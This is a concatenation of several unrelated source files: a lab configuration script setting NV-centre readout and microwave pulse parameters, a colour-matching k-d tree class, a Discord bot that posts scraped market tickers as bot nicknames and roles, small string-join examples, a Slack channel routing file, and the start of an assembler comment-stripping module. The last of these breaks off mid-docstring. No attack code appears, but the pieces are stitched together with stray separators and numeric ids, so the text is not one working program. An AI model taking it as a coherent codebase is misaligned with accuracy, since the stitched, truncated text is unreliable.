cfg.set(branch+ 'Ex_CR_amplitude', 10e-9)
cfg.set(branch+ 'Ex_RO_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 0.)
cfg.set(branch+ 'SP_duration', 100)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 25)
cfg.set(branch+ 'SSRO_repetitions', 5000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
# NOTE(review): the line below writes to hans-sil1-default although this
# section is headed "HANS/13" -- looks like a copy/paste slip; confirm the
# intended target branch (hans-sil13-default?)
cfg.set('protocols/hans-sil1-default/AdwinSSRO-integrated/SSRO_duration', 25)
###############################################################################
#### HANS/1 --- SSRO
###############################################################################
#
#branch='protocols/hans-sil1-default/AdwinSSRO/'
#cfg.set(branch+ 'A_CR_amplitude', 15e-9)
#cfg.set(branch+ 'A_RO_amplitude', 0.)
#cfg.set(branch+ 'A_SP_amplitude', 15e-9)
#cfg.set(branch+ 'CR_duration', 50)
#cfg.set(branch+ 'CR_preselect', 1000)
#cfg.set(branch+ 'CR_probe', 20)
#cfg.set(branch+ 'CR_repump', 1000)
#cfg.set(branch+ 'Ex_CR_amplitude', 4e-9)
#cfg.set(branch+ 'Ex_RO_amplitude', 4e-9)
#cfg.set(branch+ 'Ex_SP_amplitude', 0.)
#cfg.set(branch+ 'SP_duration', 250)
#cfg.set(branch+ 'SP_filter_duration', 0)
#cfg.set(branch+ 'SSRO_duration', 50)
#cfg.set(branch+ 'SSRO_repetitions', 5000)
#cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
#
#cfg.set('protocols/hans-sil1-default/AdwinSSRO-integrated/SSRO_duration', 11)
#
###############################################################################
#### HANS/1 --- MBI
###############################################################################
#
#branch='protocols/hans-sil1-default/AdwinSSRO+MBI/'
#cfg.set(branch+ 'mw_frq', mw0)
#cfg.set(branch+ 'mw_power', 20)
#cfg.set(branch+ 'Ex_MBI_amplitude', 4e-9)
#cfg.set(branch+ 'Ex_SP_amplitude', 10e-9)
#cfg.set(branch+ 'MBI_duration', 4) #put back to 4 with gate
#cfg.set(branch+ 'max_MBI_attempts', 1)
#cfg.set(branch+ 'MBI_threshold', 1)
#cfg.set(branch+ 'SP_E_duration', 60)
#cfg.set(branch+ 'repump_after_MBI_duration', 15)
#cfg.set(branch+ 'repump_after_MBI_amplitude', 15e-9)
#cfg.set(branch+ 'repump_after_E_RO_duration', 15)
#cfg.set(branch+ 'repump_after_E_RO_amplitude', 15e-9)
#
## MBI pulse
#cfg.set(branch+ 'AWG_wait_duration_before_MBI_MW_pulse', 50e-9)
#cfg.set(branch+ 'AWG_wait_for_adwin_MBI_duration', 15e-6)
#
###############################################################################
#### HANS/1 --- Pulses
###############################################################################
#
#branch='protocols/hans-sil1-default/pulses/'
#
#cfg.set(branch+ 'selective_pi_duration', 2500e-9)
#cfg.set(branch+ 'selective_pi_amp', 0.0166)
#cfg.set(branch+ 'selective_pi_mod_frq', finit)
#cfg.set(branch+ 'AWG_MBI_MW_pulse_mod_frq',
# finit)
#cfg.set(branch+ 'AWG_MBI_MW_pulse_ssbmod_frq',
# finit)
#cfg.set(branch+ 'AWG_MBI_MW_pulse_amp',
# cfg.get(branch+ 'selective_pi_amp'))
#cfg.set(branch+ 'AWG_MBI_MW_pulse_duration',
# cfg.get(branch+ 'selective_pi_duration'))
#
#cfg.set(branch+ 'fast_pi_duration', 80e-9)
#cfg.set(branch+ 'fast_pi_amp', 0.816)
#cfg.set(branch+ 'fast_pi_mod_frq', finit)
#
#cfg.set(branch+ 'fast_pi2_duration', 40e-9)
#cfg.set(branch+ 'fast_pi2_amp', 0.816)
#cfg.set(branch+ 'fast_pi2_mod_frq', finit)
#
#### CNOTs
#cfg.set(branch+ 'pi2pi_mIm1_duration', 396e-9)
#cfg.set(branch+ 'pi2pi_mIm1_amp', 0.109166)
#cfg.set(branch+ 'pi2pi_mIm1_mod_frq', finit)
#
#### CORPSE used in the BSM
#CORPSE_frq = 5e6
#cfg.set(branch+ 'CORPSE_pi_60_duration', 1./CORPSE_frq/6.)
#cfg.set(branch+ 'CORPSE_pi_m300_duration', 5./CORPSE_frq/6.)
#cfg.set(branch+ 'CORPSE_pi_420_duration', 7./CORPSE_frq/6.)
#cfg.set(branch+ 'CORPSE_pi_mod_frq', finit + Nsplit/2.)
#cfg.set(branch+ 'CORPSE_pi_amp', 0.529)
#
## ### TODO
#cfg.set(branch+ 'CORPSE_pi_phase_shift', 104.0)
#
## ### TODO
#cfg.set(branch+ 'CORPSE_pi_center_shift', 0.e-9)
#
#### CORPSE for the full ms=-1 manifold, driven in the center
#### (resonant with mI = 0)
#CORPSE_frq = 6.5e6
#cfg.set(branch+ 'msm1_CORPSE_pi_60_duration', 1./CORPSE_frq/6.)
#cfg.set(branch+ 'msm1_CORPSE_pi_m300_duration', 5./CORPSE_frq/6.)
#cfg.set(branch+ 'msm1_CORPSE_pi_420_duration', 7./CORPSE_frq/6.)
#cfg.set(branch+ 'msm1_CORPSE_pi_mod_frq', f_msm1_cntr - mw0)
#cfg.set(branch+ 'msm1_CORPSE_pi_amp', 0.797641)
#
## cfg.set(branch+ 'msm1_CORPSE_pi2_24p3_duration', 24.3/CORPSE_frq/360.)
## cfg.set(branch+ 'msm1_CORPSE_pi2_m318p6_duration', 318.6/CORPSE_frq/360.)
## cfg.set(branch+ 'msm1_CORPSE_pi2_384p3_duration', 384.3/CORPSE_frq/360.)
## cfg.set(branch+ 'msm1_CORPSE_pi2_mod_frq', f_msm1_cntr - mw0)
## cfg.set(branch+ 'msm1_CORPSE_pi2_amp', 0.818) ###not calibrated
#
#cfg.set(branch+ 'first_C_revival', 50.90e-6)
#
#### Nitrogen pulses
#cfg.set(branch+ 'N_pi_duration', 47.3e-6)
#cfg.set(branch+ 'N_pi_amp', 1)
#
#cfg.set(branch+ 'N_pi2_duration', 47.3e-6/2.)
#cfg.set(branch+ 'N_pi2_amp', 1)
#
#
"""
branch='protocols/sil2-default/pulses/'
tof = 0#11e-9
cfg.set(branch+ 't_offset', tof)
cfg.set(branch+ '4MHz_pi_duration', tof + 125e-9)
cfg.set(branch+ '4MHz_pi_amp', 0.599)
cfg.set(branch+ '4MHz_pi_mod_frq', finit)
cfg.set(branch+ '4MHz_pi2_duration', tof + 62e-9)
cfg.set(branch+ '4MHz_pi2_amp', 0.599)
cfg.set(branch+ '4MHz_pi2_mod_frq', finit)
cfg.set(branch+ 'selective_pi_duration', 2600e-9)
cfg.set(branch+ 'selective_pi_amp', 0.02)
cfg.set(branch+ 'selective_pi_mod_frq', finit)
CORPSE_frq = 3.991e6
cfg.set(branch+ 'CORPSE_pi_60_duration', tof/2. + 1./CORPSE_frq/6.)
cfg.set(branch+ 'CORPSE_pi_m300_duration', 5./CORPSE_frq/6.)
cfg.set(branch+ 'CORPSE_pi_420_duration', tof/2. + 7./CORPSE_frq/6.)
cfg.set(branch+ 'CORPSE_pi_mod_frq', finit + Nsplit/2.)
cfg.set(branch+ 'CORPSE_pi_amp', 0.703)
cfg.set(branch+ 'CORPSE_pi_phase_shift', 74.0)
cfg.set(branch+ 'CORPSE_pi_center_shift', 13e-9)
cfg.set(branch+ 'pi2pi_mIm1_duration', tof + 395e-9)
cfg.set(branch+ 'pi2pi_mIm1_amp', 0.164)
cfg.set(branch+ 'pi2pi_mIm1_mod_frq', finit)
cfg.set(branch+ 'pi2pi_mI0_duration', tof + 395e-9)
cfg.set(branch+ 'pi2pi_mI0_amp', 0.170)
cfg.set(branch+ 'pi2pi_mI0_mod_frq', f0)
cfg.set(branch+ 'pi2pi_mIp1_duration', tof + 395e-9)
cfg.set(branch+ 'pi2pi_mIp1_amp', 0.185)
cfg.set(branch+ 'pi2pi_mIp1_mod_frq', fmIp1)
### set some other pulses that determinine their values from the ones above
cfg.set(branch+ 'AWG_N_CNOT_pulse_duration',
cfg.get(branch+ 'pi2pi_mIm1_duration'))
cfg.set(branch+ 'AWG_N_CNOT_pulse_amp',
cfg.get(branch+ 'pi2pi_mIm1_amp'))
cfg.set(branch+ 'AWG_N_CNOT_pulse_mod_frq',
cfg.get(branch+ 'pi2pi_mIm1_mod_frq'))
cfg.set(branch+ 'AWG_MBI_MW_pulse_mod_frq',
finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_amp',
cfg.get(branch+ 'selective_pi_amp'))
cfg.set(branch+ 'AWG_MBI_MW_pulse_duration',
cfg.get(branch+ 'selective_pi_duration'))
cfg.set(branch+ 'AWG_shelving_pulse_duration',
cfg.get(branch+ '4MHz_pi_duration'))
cfg.set(branch+ 'AWG_shelving_pulse_amp',
cfg.get(branch+ '4MHz_pi_amp'))
### Nitrogen pulses
cfg.set(branch+ 'N_pi_duration', 91.1e-6)
cfg.set(branch+ 'N_pi_amp', 1)
cfg.set(branch+ 'N_pi2_duration', 91.1e-6/2.)
cfg.set(branch+ 'N_pi2_amp', 1)
##############################################################################
### The111/2 - SSRO
##############################################################################
branch='protocols/sil2-default/AdwinSSRO/'
cfg.set(branch+ 'A_CR_amplitude', 10e-9)
cfg.set(branch+ 'A_RO_amplitude', 0.)
cfg.set(branch+ 'A_SP_amplitude', 10e-9)
cfg.set(branch+ 'CR_duration', 100)
cfg.set(branch+ 'CR_preselect', 40)
cfg.set(branch+ 'CR_probe', 40)
cfg.set(branch+ 'CR_repump', 1000)
cfg.set(branch+ 'Ex_CR_amplitude', 5e-9)
cfg.set(branch+ 'Ex_RO_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 0.)
cfg.set(branch+ 'SP_duration', 250)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 50)
cfg.set(branch+ 'SSRO_repetitions', 1000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
### integrated SSRO
cfg.set('protocols/sil2-default/AdwinSSRO-integrated/SSRO_duration', 15)
##############################################################################
### The111/2 - MBI
##############################################################################
branch='protocols/sil2-default/AdwinSSRO+MBI/'
cfg.set(branch+ 'mw_frq', mw0)
cfg.set(branch+ 'mw_power', 20)
cfg.set(branch+ 'Ex_MBI_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 10e-9)
cfg.set(branch+ 'MBI_duration', 4)
cfg.set(branch+ 'max_MBI_attempts', 1)
cfg.set(branch+ 'MBI_threshold', 1)
cfg.set(branch+ 'SP_E_duration', 100)
cfg.set(branch+ 'repump_after_MBI_duration', 100)
cfg.set(branch+ 'repump_after_MBI_amplitude', 25e-9)
cfg.set(branch+ 'repump_after_E_RO_duration', 100)
cfg.set(branch+ 'repump_after_E_RO_amplitude', 25e-9)
# MBI pulse
cfg.set(branch+ 'AWG_wait_duration_before_MBI_MW_pulse', 50e-9)
cfg.set(branch+ 'AWG_wait_for_adwin_MBI_duration', 15e-6)
### sil2, BSM
cfg.set('protocols/sil2-default/BSM/N_ref_frq', N_frq)
cfg.set('protocols/sil2-default/BSM/e_ref_frq', finit)
##############################################################################
### HANS/1 --- Pulses
##############################################################################
branch='protocols/hans-sil1-default/pulses/'
cfg.set(branch+ 'selective_pi_duration', 2500e-9)
cfg.set(branch+ 'selective_pi_amp', 0.015)
cfg.set(branch+ 'selective_pi_mod_frq', finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_mod_frq',
finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_ssbmod_frq',
finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_amp',
cfg.get(branch+ 'selective_pi_amp'))
cfg.set(branch+ 'AWG_MBI_MW_pulse_duration',
cfg.get(branch+ 'selective_pi_duration'))
##############################################################################
### HANS/1 --- SSRO
##############################################################################
branch='protocols/hans-sil1-default/AdwinSSRO/'
cfg.set(branch+ 'A_CR_amplitude', 15e-9)
cfg.set(branch+ 'A_RO_amplitude', 0.)
cfg.set(branch+ 'A_SP_amplitude', 15e-9)
cfg.set(branch+ 'CR_duration', 50)
cfg.set(branch+ 'CR_preselect', 1000)
cfg.set(branch+ 'CR_probe', 20)
cfg.set(branch+ 'CR_repump', 1000)
cfg.set(branch+ 'Ex_CR_amplitude', 5e-9)
cfg.set(branch+ 'Ex_RO_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 0.)
cfg.set(branch+ 'SP_duration', 250)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 50)
cfg.set(branch+ 'SSRO_repetitions', 5000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
cfg.set('protocols/hans-sil1-default/AdwinSSRO-integrated/SSRO_duration', 15)
##############################################################################
### HANS/1 --- MBI
##############################################################################
branch='protocols/hans-sil1-default/AdwinSSRO+MBI/'
cfg.set(branch+ 'mw_frq', mw0)
cfg.set(branch+ 'mw_power', 20)
cfg.set(branch+ 'Ex_MBI_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 15e-9)
cfg.set(branch+ 'MBI_duration', 4)
cfg.set(branch+ 'max_MBI_attempts', 1)
cfg.set(branch+ 'MBI_threshold', 1)
cfg.set(branch+ 'SP_E_duration', 60)
cfg.set(branch+ 'repump_after_MBI_duration', 15)
cfg.set(branch+ 'repump_after_MBI_amplitude', 15e-9)
cfg.set(branch+ 'repump_after_E_RO_duration', 15)
cfg.set(branch+ 'repump_after_E_RO_amplitude', 15e-9)
# MBI pulse
cfg.set(branch+ 'AWG_wait_duration_before_MBI_MW_pulse', 50e-9)
cfg.set(branch+ 'AWG_wait_for_adwin_MBI_duration', 15e-6)
##############################################################################
### HANS/7
##############################################################################
branch='protocols/hans-sil7-default/AdwinSSRO/'
cfg.set(branch+ 'A_CR_amplitude', 10e-9)
cfg.set(branch+ 'A_RO_amplitude', 0.)
cfg.set(branch+ 'A_SP_amplitude', 10e-9)
cfg.set(branch+ 'CR_duration', 100)
cfg.set(branch+ 'CR_preselect', 15)
cfg.set(branch+ 'CR_probe', 5)
cfg.set(branch+ 'CR_repump', 1000)
cfg.set(branch+ 'Ex_CR_amplitude', 5e-9)
cfg.set(branch+ 'Ex_RO_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 0.)
cfg.set(branch+ 'SP_duration', 250)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 50)
cfg.set(branch+ 'SSRO_repetitions', 5000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
cfg.set('protocols/hans-sil7-default/AdwinSSRO-integrated/SSRO_duration', 50)
"""
##############################################################################
### HANS/4 --- SSRO
##############################################################################
branch='protocols/hans-sil4-default/AdwinSSRO/'
cfg.set(branch+ 'A_CR_amplitude', 5e-9)
cfg.set(branch+ 'A_RO_amplitude', 0.)
cfg.set(branch+ 'A_SP_amplitude', 60e-9)
cfg.set(branch+ 'CR_duration', 50)
cfg.set(branch+ 'CR_preselect', 1000)
cfg.set(branch+ 'CR_probe', 20)
cfg.set(branch+ 'CR_repump', 1000)
cfg.set(branch+ 'Ex_CR_amplitude', 5e-9)
cfg.set(branch+ 'Ex_RO_amplitude', 10e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 0.)
cfg.set(branch+ 'SP_duration', 9)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 10)
cfg.set(branch+ 'SSRO_repetitions', 5000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
cfg.set('protocols/hans-sil4-default/AdwinSSRO-integrated/SSRO_duration', 10)
cfg.set('protocols/hans-sil4-default/AdwinSSRO+espin/mw_frq', mw0)
cfg.set('protocols/hans-sil4-default/AdwinSSRO+espin/mw_power', 20)
##############################################################################
### HANS/4 --- MBI
##############################################################################
branch='protocols/hans-sil4-default/AdwinSSRO+MBI/'
cfg.set(branch+ 'mw_frq', mw0)
cfg.set(branch+ 'mw_power', 20)
cfg.set(branch+ 'Ex_MBI_amplitude', 5e-9)
cfg.set(branch+ 'Ex_SP_amplitude', 10e-9)
cfg.set(branch+ 'MBI_duration', 4)
cfg.set(branch+ 'max_MBI_attempts', 1)
cfg.set(branch+ 'MBI_threshold', 1)
cfg.set(branch+ 'SP_E_duration', 100)
cfg.set(branch+ 'repump_after_MBI_duration', 15)
cfg.set(branch+ 'repump_after_MBI_A_amplitude', [5e-9])
cfg.set(branch+ 'repump_after_MBI_E_amplitude', [0e-9])
cfg.set(branch+ 'repump_after_E_RO_duration', 15)
cfg.set(branch+ 'repump_after_E_RO_amplitude', 5e-9)
# MBI pulse
cfg.set(branch+ 'AWG_wait_duration_before_MBI_MW_pulse', 50e-9)
cfg.set(branch+ 'AWG_wait_for_adwin_MBI_duration', 15e-6)
### BSM
cfg.set('protocols/hans-sil4-default/BSM/N_ref_frq', N_frq)
cfg.set('protocols/hans-sil4-default/BSM/e_ref_frq', finit)
cfg.set('protocols/hans-sil4-default/BSM/pi2_evolution_time', 51.086e-6)
cfg.set('protocols/hans-sil4-default/BSM/H_evolution_time', 50.746e-6)
cfg.set('protocols/hans-sil4-default/BSM/H_phase', 46)
##############################################################################
### HANS/4 --- Pulses
##############################################################################
branch='protocols/hans-sil4-default/pulses/'
cfg.set(branch+ 'selective_pi_duration', 2500e-9)
cfg.set(branch+ 'selective_pi_amp', 0.011)
cfg.set(branch+ 'selective_pi_mod_frq', finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_mod_frq',
finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_ssbmod_frq',
finit)
cfg.set(branch+ 'AWG_MBI_MW_pulse_amp',
cfg.get(branch+ 'selective_pi_amp'))
cfg.set(branch+ 'AWG_MBI_MW_pulse_duration',
cfg.get(branch+ 'selective_pi_duration'))
cfg.set(branch+ 'fast_pi_duration', 62e-9)
cfg.set(branch+ 'fast_pi_amp', 0.844)
cfg.set(branch+ 'fast_pi_mod_frq', finit)
cfg.set(branch+ 'fast_pi2_duration', 33e-9)
cfg.set(branch+ 'fast_pi2_amp', 0.812)
cfg.set(branch+ 'fast_pi2_mod_frq', finit)
### CNOTs
cfg.set(branch+ 'pi2pi_mIm1_duration', 396e-9)
cfg.set(branch+ 'pi2pi_mIm1_amp', 0.083)
cfg.set(branch+ 'pi2pi_mIm1_mod_frq', finit)
### CORPSE used in the BSM
CORPSE_frq = 7.5e6
cfg.set(branch+ 'CORPSE_pi_60_duration', 1./CORPSE_frq/6.)
cfg.set(branch+ 'CORPSE_pi_m300_duration', 5./CORPSE_frq/6.)
cfg.set(branch+ 'CORPSE_pi_420_duration', 7./CORPSE_frq/6.)
cfg.set(branch+ 'CORPSE_pi_mod_frq', finit + Nsplit/2.)
cfg.set(branch+ 'CORPSE_pi_amp', 0.363)
cfg.set(branch+ 'CORPSE_pi2_24p3_duration', 24.3/CORPSE_frq/360.)
cfg.set(branch+ 'CORPSE_pi2_m318p6_duration', 318.6/CORPSE_frq/360.)
cfg.set(branch+ 'CORPSE_pi2_384p3_duration', 384.3/CORPSE_frq/360.)
cfg.set(branch+ 'CORPSE_pi2_mod_frq', f_msm1_cntr - mw0)
cfg.set(branch+ 'CORPSE_pi2_amp', 0.55) ###not calibrated
"""
# ### TODO
cfg.set(branch+ 'CORPSE_pi_phase_shift', 104.0)
# ### TODO
cfg.set(branch+ 'CORPSE_pi_center_shift', 0.e-9)
### CORPSE for the full ms=-1 manifold, driven in the center
### (resonant with mI = 0)
CORPSE_frq = 8e6
cfg.set(branch+ 'msm1_CORPSE_pi_60_duration', 1./CORPSE_frq/6.)
cfg.set(branch+ 'msm1_CORPSE_pi_m300_duration', 5./CORPSE_frq/6.)
cfg.set(branch+ 'msm1_CORPSE_pi_420_duration', 7./CORPSE_frq/6.)
cfg.set(branch+ 'msm1_CORPSE_pi_mod_frq', f_msm1_cntr - mw0)
cfg.set(branch+ 'msm1_CORPSE_pi_amp', 0.782)
cfg.set(branch+ 'msm1_CORPSE_pi2_24p3_duration', 24.3/CORPSE_frq/360.)
cfg.set(branch+ 'msm1_CORPSE_pi2_m318p6_duration', 318.6/CORPSE_frq/360.)
cfg.set(branch+ 'msm1_CORPSE_pi2_384p3_duration', 384.3/CORPSE_frq/360.)
cfg.set(branch+ 'msm1_CORPSE_pi2_mod_frq', f_msm1_cntr - mw0)
cfg.set(branch+ 'msm1_CORPSE_pi2_amp', 0.818) ###not calibrated
cfg.set(branch+ 'first_C_revival', 50.90e-6)
### Nitrogen pulses
cfg.set(branch+ 'N_pi_duration', 47.3e-6)
cfg.set(branch+ 'N_pi_amp', 1)
cfg.set(branch+ 'N_pi2_duration', 47.3e-6/2.)
cfg.set(branch+ 'N_pi2_amp', 1)
"""
##############################################################################
##############################################################################
##############################################################################
### DONE
##############################################################################
##############################################################################
##############################################################################
# persist all configuration trees to disk so the values above survive restarts
cfg.save_all()
|
8,093 | e239c2089fc6d4ab646c490b6e3de8953cec5634 | from typing import Sequence, Union, Tuple
import kdtree
from colour import Color
# ansi payload for a color: markup string, single color code, or (r, g, b) ints
AnsiCodeType = Union[str, int, Tuple[int, int, int]]
class ColorPoint(object):
    """A source color viewed as a 3-d point (its HSL coordinates), carrying
    the target color and the target's ansi representation as payload.
    """

    def __init__(self, source: Color, target: Color,
                 ansi: AnsiCodeType) -> None:
        """
        Map source color to target color, stores target
        ansi color ans a single int, a sequence of RGB as ints
        or markup string.
        """
        self.source = source
        self.target = target
        self.ansi = ansi

    def __len__(self) -> int:
        """A color point always has three coordinates.

        >>> len(ColorPoint(Color('black'), Color('white'), '')) == 3
        True
        """
        return 3

    def __getitem__(self, item) -> float:
        """Return coordinate *item* of the source color (HSL order).

        >>> cp = ColorPoint(Color('#880073'), Color('white'), '')
        >>> cp[0]  # hue
        0.8590686274509803
        >>> cp[1]  # saturation
        1.0
        >>> cp[2]  # luminance
        0.26666666666666666
        """
        coords = self.source.hsl  # (hue, saturation, luminance)
        return coords[item]

    def __repr__(self) -> str:
        return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)
class ColorMatch(object):
    """Nearest-neighbour lookup of ColorPoints in a 3-D (HSL) k-d tree."""

    def __init__(self) -> None:
        self.tree = kdtree.create(dimensions=3)

    def add(self, source: Color, target: Color, ansi: AnsiCodeType) -> None:
        """Register a source→target mapping in the search tree."""
        self.tree.add(ColorPoint(source, target, ansi))

    def match(self, color: Color) -> ColorPoint:
        """Return the registered ColorPoint whose source is closest to *color*.

        >>> cm = ColorMatch()
        >>> cm.add(Color('red'), Color('white'), '')
        >>> cm.add(Color('blue'), Color('white'), '')
        >>> cm.match(Color('yellow'))
        ColorPoint(<Color red> => <Color white>)
        """
        nearest = self.tree.search_nn(color.hsl)
        if not nearest:
            raise KeyError('No match found for color: {}'.format(color))
        return nearest[0].data
|
8,094 | e57109f1c5c2e1468ef1cf9f10fba743633ca150 | from discord.ext import commands, tasks
from discord.utils import get
import discord
import re
import json
import time
import random
import asyncio
import os
import datetime
from live_ticker_scrape import wrangle_data
from tokens import dev, dev1, es, nas, dow, us10y, dollar, vix, btc, eth, silver , link
# One discord Client per tracked ticker: each bot displays a single quote
# via its nickname and "watching" presence.
es_bot = discord.Client()
nas_bot = discord.Client()
dow_bot = discord.Client()
us10y_bot = discord.Client()
vix_bot = discord.Client()
# NOTE(review): this client appears unused -- the name is shadowed by a
# local `ticker_vix` inside the update loop.  Confirm it can be removed.
ticker_vix = discord.Client()
dollar_bot = discord.Client()
silver_bot = discord.Client()
btc_bot = discord.Client()
eth_bot= discord.Client()
link_bot = discord.Client()
# Shared event loop on which all clients are run concurrently.
loop = asyncio.get_event_loop()
# Each client logs a line once its gateway connection is ready.
@es_bot.event
async def on_ready():
    print('es started')

@nas_bot.event
async def on_ready():
    print('nas started')

@dow_bot.event
async def on_ready():
    print('dow started')

@silver_bot.event
async def on_ready():
    print('silver started')

@us10y_bot.event
async def on_ready():
    print('us10y started')

# Fixed: was `on_Ready` -- @Client.event registers handlers by function
# name, so the misnamed handler was never called.
@dollar_bot.event
async def on_ready():
    print('dollar started')

@vix_bot.event
async def on_ready():
    print('vix started')

@btc_bot.event
async def on_ready():
    print('btc started')

@eth_bot.event
async def on_ready():
    print('eth started')

@link_bot.event
async def on_ready():
    print('link started')
'''
@tasks.loop() can be changed to seconds, minutes, hours
https://discordpy.readthedocs.io/en/latest/ext/tasks/
'''
async def _update_ticker(bot, ticker, nick_prefix, label):
    """Push one ticker's latest quote to every guild the bot is in.

    Sets the bot's nickname to the last price, its "watching" presence to
    the percent change, and swaps its RED/GREEN role to match the sign of
    the change.  A falsy *ticker* (nothing scraped) is logged and skipped.
    """
    if not ticker:
        print(f'no {label} data')
        return
    nick = '{:20,.2f}'.format(ticker['last'])
    change = ticker['change%']
    for guild in (bot.get_guild(g.id) for g in bot.guilds):
        try:
            red = get(guild.roles, name='RED')
            green = get(guild.roles, name='GREEN')
            me = guild.me
            # A '-' in the change string means the ticker is down.
            if '-' in change:
                await me.remove_roles(green)
                await me.add_roles(red)
            else:
                await me.remove_roles(red)
                await me.add_roles(green)
            await me.edit(nick=f"{nick_prefix} {nick}")
            await bot.change_presence(activity=discord.Activity(
                type=discord.ActivityType.watching, name=f"{label} {change}"))
        except Exception:
            print(f'broke in {guild}')


@tasks.loop(seconds=5)
async def called_second():
    """Scrape the latest quotes and fan them out to every ticker bot.

    The original inlined ten near-identical copies of the per-ticker
    update; they are collapsed into _update_ticker above.  This also
    fixes the vix guard, which tested the `vix` bot *token* (always
    truthy) instead of the scraped data, crashing the loop when the vix
    quote was missing.
    """
    data = wrangle_data()
    print(data)
    await _update_ticker(es_bot, data['es'], '1)', 'ES')
    await _update_ticker(nas_bot, data['nas'], '2)', 'NQ')
    await _update_ticker(dow_bot, data['dow'], '3)', 'DJI')
    await _update_ticker(vix_bot, data['vix'], '4)', 'VIX')
    await _update_ticker(dollar_bot, data['dxy'], '5)', 'DXY')
    # NOTE(review): the original also numbered us10y "4)", clashing with
    # vix; preserved as-is -- confirm the intended ordering before renumbering.
    await _update_ticker(us10y_bot, data['us10y'], '4)', 'US10Y')
    silver_ticker = data['silver']
    silver_label = silver_ticker['name'].upper() if silver_ticker else 'SILVER'
    await _update_ticker(silver_bot, silver_ticker, '6)', silver_label)
    await _update_ticker(btc_bot, data['btc'], '7)', 'BTC')
    await _update_ticker(eth_bot, data['eth'], '8)', 'ETH')
    await _update_ticker(link_bot, data['link'], '9)', 'LINK')
    print('updated')
@called_second.before_loop
async def before():
    """Delay the first update cycle until every client is logged in."""
    await es_bot.wait_until_ready()
    await nas_bot.wait_until_ready()
    await dow_bot.wait_until_ready()
    await vix_bot.wait_until_ready()
    await us10y_bot.wait_until_ready()
    await dollar_bot.wait_until_ready()
    await silver_bot.wait_until_ready()
    await btc_bot.wait_until_ready()
    await eth_bot.wait_until_ready()
    await link_bot.wait_until_ready()
    print("Finished waiting")

# Schedule the 5-second update loop (it starts running once the loop is up).
called_second.start()
async def create_bots():
    """Start every ticker client as a task on the shared event loop."""
    bots_and_tokens = [
        (es_bot, es), (nas_bot, nas), (dow_bot, dow), (vix_bot, vix),
        (us10y_bot, us10y), (dollar_bot, dollar), (silver_bot, silver),
        (btc_bot, btc), (eth_bot, eth), (link_bot, link),
    ]
    # Create all tasks first so the clients connect concurrently, then
    # await them in order (same behaviour as the original unrolled code).
    pending = [loop.create_task(bot.start(token)) for bot, token in bots_and_tokens]
    for task in pending:
        await task

loop.run_until_complete(create_bots())
8,095 | 4ce1e802831f09e503d18fd287cb35400986e3c8 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# auther : xiaojinsong(61627515@qq.com)
# Sample data for the string-joining examples below.
parts = ['Is', 'Chicago', 'Not', 'Chicago?']
data = ['ACME', 50, 91.1]
print(' '.join(parts))
def generate_str():
    """Print the module-level *data* values joined by commas."""
    print(','.join(map(str, data)))
def sample():
    """Yield the words of the example sentence one at a time."""
    for word in ('Is', 'Chicago', 'Not', 'Chicago?'):
        yield word
def combine(source, maxsize):
    """Join strings from *source* into chunks larger than *maxsize* chars.

    Parts are accumulated until their combined length exceeds *maxsize*,
    at which point they are emitted as one joined string.  Any remainder
    is emitted at the end.  Unlike the original, an empty trailing chunk
    (empty source, or a source consumed exactly at a boundary) is no
    longer yielded.
    """
    parts = []
    size = 0
    for part in source:
        parts.append(part)
        size += len(part)
        if size > maxsize:
            yield ''.join(parts)
            parts = []
            size = 0
    if parts:  # suppress the spurious '' the original emitted here
        yield ''.join(parts)
if __name__ == '__main__':
    # Demonstrate the three joining strategies: map+join, generator+join,
    # and chunked streaming written to a file.
    generate_str()
    print(','.join(sample()))
    with open('combine.txt', 'w') as f:
        f.writelines(combine(sample(), 32768))
8,096 | 8439972b4458ba66d98f6a80a82a35576df472a4 | from channels.routing import route
from .consumers import message_consumer
# Route incoming Slack RTM messages to the message_consumer handler.
channel_routing = [
    route("slack.rtm.message", message_consumer)
]
8,097 | 11e9e4dd5c9c6158fed40080d4cc221f28a0eba0 | #!/usr/bin/python
import sys
import os
class ParseError(Exception):
    """Raised when an assembly source line cannot be parsed or encoded."""
    pass
def remove_inline_comments(text):
    """Strip /* ... */ block comments from *text* and return the result.

    Exits with status 2 if a comment block is opened but never closed.
    """
    ret = []
    in_comment_block = False
    p = 0
    while True:
        # Find the next comment opener.  Compare against -1 (not > 0) so
        # a comment starting at position 0 is recognised too -- the
        # original `> 0` test returned such text unmodified.
        if (op := text.find('/*', p)) != -1:
            in_comment_block = True
            if op != p:
                ret.append(text[p:op])
            p = op + 2
        else:
            ret.append(text[p:])
            break
        if (op := text.find('*/', p)) != -1:
            p = op + 2
            in_comment_block = False
            continue
        else:
            break
    if in_comment_block:
        # Unterminated /* comment.
        exit(2)
    return ''.join(ret)
def remove_comments(contents):
    """Drop // line comments from an iterable of source lines.

